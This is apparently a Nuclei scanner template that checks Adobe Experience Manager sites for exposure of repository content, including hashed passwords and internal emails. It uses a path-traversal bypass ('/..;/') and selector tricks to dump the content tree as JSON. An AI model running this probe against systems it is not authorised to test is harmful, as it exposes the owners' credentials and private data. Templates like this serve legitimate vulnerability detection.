id: aem-secrets

info:
  name: AEM Secrets - Sensitive Information Disclosure
  author: j3ssie & boobooHQ
  severity: high
  reference:
    - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/
  description: |
    Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.
  metadata:
    max-request: 2
    verified: "true"
  tags: aem,adobe,misconfig,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"
      - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json"

    headers:
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Language: en-US,en;q=0.9,hi;q=0.8

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jcr:uuid"'
          - '"jcr:createdBy"'
          - '"uri"'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
